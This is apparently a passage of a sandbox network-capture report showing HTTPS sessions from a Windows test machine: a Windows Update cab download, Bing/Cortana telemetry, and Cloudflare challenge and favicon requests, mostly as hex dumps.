                                                                                                                                                                                    2024-01-26 13:41:37 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    25192.168.2.164975140.127.169.103443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:37 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=wN7XR4hVYYybUva&MD=vM4W2nhp HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                    2024-01-26 13:41:37 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                    MS-CorrelationId: 75ecaec1-55e6-4f28-9f49-03ee224274fc
                                                                                                                                                                                    MS-RequestId: 201189f7-bdc0-4ad3-b365-27c58ef20381
                                                                                                                                                                                    MS-CV: E62ecopEsUqzBC+i.0
                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:36 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                    2024-01-26 13:41:37 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                    2024-01-26 13:41:37 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                    26192.168.2.164975423.1.237.25443
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:37 UTC2273OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                                                    Origin: https://www.bing.com
                                                                                                                                                                                    Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Language: en-CH
                                                                                                                                                                                    Content-type: text/xml
                                                                                                                                                                                    X-Agent-DeviceId: 01000A4109009A83
                                                                                                                                                                                    X-BM-CBT: 1696585056
                                                                                                                                                                                    X-BM-DateFormat: dd/MM/yyyy
                                                                                                                                                                                    X-BM-DeviceDimensions: 784x984
                                                                                                                                                                                    X-BM-DeviceDimensionsLogical: 784x984
                                                                                                                                                                                    X-BM-DeviceScale: 100
                                                                                                                                                                                    X-BM-DTZ: 120
                                                                                                                                                                                    X-BM-Market: CH
                                                                                                                                                                                    X-BM-Theme: 000000;0078d7
                                                                                                                                                                                    X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:2C89765
                                                                                                                                                                                    X-Device-ClientSession: 8B0BADD9680C444587B50653454AB647
                                                                                                                                                                                    X-Device-isOptin: false
                                                                                                                                                                                    X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                                                                                                    X-Device-OSSKU: 48
                                                                                                                                                                                    X-Device-Touch: false
                                                                                                                                                                                    X-DeviceID: 01000A4109009A83
                                                                                                                                                                                    X-MSEdge-ExternalExp: bfbscope1003t3,bfbwsbpphmemqcf,bfbwsbrs0830cf,d-thshld78,d-thshldspcl40,disfbcthas2_1,fliptrat6,spofglclicksh-c2,wsbqfasmsall_c,wsbref-c
                                                                                                                                                                                    X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                                                    X-PositionerType: Desktop
                                                                                                                                                                                    X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                                                    X-Search-CortanaAvailableCapabilities: None
                                                                                                                                                                                    X-Search-SafeSearch: Moderate
                                                                                                                                                                                    X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                                                                                                    X-UserAgeClass: Unknown
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                                                                                                    Host: www.bing.com
                                                                                                                                                                                    Content-Length: 608
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Cookie: SRCHUID=V=2&GUID=1365D4FE3DA84D19A46408EFC15FC823&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231006; SRCHHPGUSR=SRCHLANG=en&HV=1696584863&IPMH=5e4190f4&IPMID=1696585056345&LUT=1696585056224; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=1F9344FA7B5C6D050D8557587A606C51&CPID=1696585056799&AC=1&CPH=074c06b2&CBV=39996767; _EDGE_S=SID=1F9344FA7B5C6D050D8557587A606C51; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
                                                                                                                                                                                    2024-01-26 13:41:37 UTC1OUTData Raw: 3c
                                                                                                                                                                                    Data Ascii: <
                                                                                                                                                                                    2024-01-26 13:41:37 UTC607OUTData Raw: 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 35 30 34 37 45 35 39 34 32 42 42 32 34 36 30 45 41 33 35 42 35 33 43 43 46 37 38 44 44 42 33 44 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 36 34 38 31 41 46 33 32 31 31 46 30 34 33 44 41 39 30 30 39 46 46 31 30 39 32 45 43 36 45 36 46 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 54 22 3a 22 43 49 2e 42 6f 78 4d 6f 64 65 6c 22 2c 22 46 49 44 22 3a 22 43 49
                                                                                                                                                                                    Data Ascii: ClientInstRequest><CID>5047E5942BB2460EA35B53CCF78DDB3D</CID><Events><E><T>Event.ClientInst</T><IG>6481AF3211F043DA9009FF1092EC6E6F</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
                                                                                                                                                                                    2024-01-26 13:41:37 UTC476INHTTP/1.1 204 No Content
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    X-MSEdge-Ref: Ref A: 8E983CCD75B2424B8C343762C326F9BF Ref B: PAOEDGE0610 Ref C: 2024-01-26T13:41:37Z
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:37 GMT
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=93600
                                                                                                                                                                                    X-CDN-TraceID: 0.15ed0117.1706276497.490ff25e


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    27192.168.2.1649756104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:39 UTC757OUTGET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: document
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:40 UTC248INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:39 GMT
                                                                                                                                                                                    Content-Type: image/png
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    cache-control: max-age=2629800, public
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92cbc99e4507d-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:40 UTC67INData Raw: 33 64 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 02 00 00 00 02 08 02 00 00 00 fd d4 9a 73 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 0d 0a
                                                                                                                                                                                    Data Ascii: 3dPNGIHDRsIDAT$IENDB`
                                                                                                                                                                                    2024-01-26 13:41:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    28192.168.2.1649757104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:40 UTC695OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                    Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:40 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:40 GMT
                                                                                                                                                                                    Content-Type: null
                                                                                                                                                                                    Content-Length: 7406
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 84b92cbdab207ba5-ATL
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                    ETag: "7b24b5e3ebb94fefdfd271a0e630916b"
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:40 UTC941INData Raw: 00 00 01 00 03 00 30 30 00 00 01 00 08 00 a8 0e 00 00 36 00 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 de 0e 00 00 10 10 00 00 01 00 08 00 68 05 00 00 86 17 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 08 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 df 63 14 00 eb 9a 66 00 f6 d2 bb 00 df 64 17 00 e0 64 17 00 e5 82 43 00 e6 83 46 00 f7 d8 c4 00 e1 6a 20 00 f1 bf 9e 00 e6 88 4c 00 fd f7 f3 00 f8 de cd 00 e2 70 29 00 e8 8e 55 00 dc 57 03 00 dd 57 03 00 ff fd fc 00 e3 75 2f 00 e9 94 5e 00 de 5d 0c 00 f5 cc b3 00 de 5e 0f 00 df 63 15 00 df 64 18 00 fc f0 e8 00 e0 69 1e 00 f1 bf 9f 00 fd f6 f1 00 dc 56 01 00 e8 8e 56 00 dd 57 04 00 e3 74 2d 00 e3 75 30 00 f4 cb b1 00 e9 94 5f 00 dd 5d 0d 00 de 5d 0d 00 e4 7b 39 00 df 62 13 00 f6
                                                                                                                                                                                    Data Ascii: 006 h(0`cfddCFj Lp)UWWu/^]^cdiVVWt-u0_]]{9b
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 c9 9d 4a 56 85 94 94 94 94 94 94 94 94 94 94 94 94 c0 29 4a 4a 4a 95 a9 94 94 94 5f 4a 4a 4f 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 11 9e 4a 82 98 94 94 94 94 94 94 94 94 94 94 94 94 94 c0 29 4a 4a 4a 95 a9 94 94 64 4a 4a 36 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 7c 9d 73 52 94 94 94 94 94 94 94 94 94 94 94 94 94 94 a9 af 4a 4a 4a 4d 94 60 88 4a 92 72 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 8f 2c 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 c0 29 4a 76 94 94 7b ad 4a 03 3f 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 79 0c 5b 94 94 94 94 94 94 94 94 a9 22 94 94 94 0d 4a 4a 7c 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94
                                                                                                                                                                                    Data Ascii: JV)JJJ_JJOJ)JJJdJJ6|sRJJJM`Jr,)Jv{J?y["JJ|
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 08 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 e0 63 14 00 e5 82 43 00 fc f1 ea 00 e6 83 46 00 f6 d8 c4 00 e0 6a 20 00 fd f7 f3 00 f3 c1 a4 00 dd 57 03 00 e2 75 2f 00 e9 94 5e 00 de 5d 0c 00 f5 cc b3 00 e9 95 61 00 e4 7b 38 00 ef b3 8d 00 fb ea df 00 ea 9a 67 00 df 63 15 00 eb 9b 6a 00 e5 81 41 00 fc f0 e8 00
                                                                                                                                                                                    Data Ascii: ( @cCFj Wu/^]a{8gcjA
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 8a 82 57 3e 0e 37 79 41 73 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 48 58 8f 44 44 44 44 44 44 29 79 3a 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 8a 11 3b 44 2c 17 41 62 0f 36 65 91 44 18 87 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 21 7d 35 43 93 72 72 72 72 72 72 80 09 44 81 07 72 72 72 72 72 72 72 72 72 72 72 72 72 72 72 40 0b 92 2f 72 72 72 72 72 72 72 72 72 7a 4a 44 2d 23 72 72 72 72 72 72 72 72 72 72 72 72 72 86 1c 1d 64 72 72 72 2b 1e 2b 72 72 72 72 72 06 46 44 79 72 72 72 72 72 72 72 72 72 72 72 72 72 34 33 89 86 72 72 2b 70 44 70 2b 72 72 72 72 72 0c 22 29 73 72 72 72 72 72 72 72 72 72 72 72 72 5f 44 13 72 72 2b 70 44 33 44 70
                                                                                                                                                                                    Data Ascii: rrrrrrrrrrrrrrrrrrrrrrrrrW>7yAsrrrrrrrrrrrrrrrrrrrrrrHXDDDDDD)y:rrrrrrrrrrrrrrrrrr;D,Ab6eDrrrrrrrrrrrrrrrrr!}5CrrrrrrDrrrrrrrrrrrrrrr@/rrrrrrrrrzJD-#rrrrrrrrrrrrrdrrr++rrrrrFDyrrrrrrrrrrrrr43rr+pDp+rrrrr")srrrrrrrrrrrr_Drr+pD3Dp
                                                                                                                                                                                    2024-01-26 13:41:40 UTC989INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    29192.168.2.1649758104.17.2.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:40 UTC360OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:40 UTC428INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:40 GMT
                                                                                                                                                                                    Content-Type: null
                                                                                                                                                                                    Content-Length: 7406
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    CF-Ray: 84b92cc16fec138b-ATL
                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                    Cache-Control: public, max-age=0, must-revalidate
                                                                                                                                                                                    ETag: "7b24b5e3ebb94fefdfd271a0e630916b"
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:40 UTC941INData Raw: 00 00 01 00 03 00 30 30 00 00 01 00 08 00 a8 0e 00 00 36 00 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 de 0e 00 00 10 10 00 00 01 00 08 00 68 05 00 00 86 17 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 08 00 00 00 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 df 63 14 00 eb 9a 66 00 f6 d2 bb 00 df 64 17 00 e0 64 17 00 e5 82 43 00 e6 83 46 00 f7 d8 c4 00 e1 6a 20 00 f1 bf 9e 00 e6 88 4c 00 fd f7 f3 00 f8 de cd 00 e2 70 29 00 e8 8e 55 00 dc 57 03 00 dd 57 03 00 ff fd fc 00 e3 75 2f 00 e9 94 5e 00 de 5d 0c 00 f5 cc b3 00 de 5e 0f 00 df 63 15 00 df 64 18 00 fc f0 e8 00 e0 69 1e 00 f1 bf 9f 00 fd f6 f1 00 dc 56 01 00 e8 8e 56 00 dd 57 04 00 e3 74 2d 00 e3 75 30 00 f4 cb b1 00 e9 94 5f 00 dd 5d 0d 00 de 5d 0d 00 e4 7b 39 00 df 62 13 00 f6
                                                                                                                                                                                    Data Ascii: 006 h(0`cfddCFj Lp)UWWu/^]^cdiVVWt-u0_]]{9b
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94
                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                    2024-01-26 13:41:40 UTC1369INData Raw: 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 c9 9d 4a 56 85 94 94 94 94 94 94 94 94 94 94 94 94 c0 29 4a 4a 4a 95 a9 94 94 94 5f 4a 4a 4f 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 11 9e 4a 82 98 94 94 94 94 94 94 94 94 94 94 94 94 94 c0 29 4a 4a 4a 95 a9 94 94 64 4a 4a 36 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 7c 9d 73 52 94 94 94 94 94 94 94 94 94 94 94 94 94 94 a9 af 4a 4a 4a 4d 94 60 88 4a 92 72 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 8f 2c 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 c0 29 4a 76 94 94 7b ad 4a 03 3f 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 79 0c 5b 94 94 94 94 94 94 94 94 a9 22 94 94 94 0d 4a 4a 7c 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94 94
                                                                                                                                                                                    Data Ascii: JV)JJJ_JJOJ)JJJdJJ6|sRJJJM`Jr,)Jv{J?y["JJ|
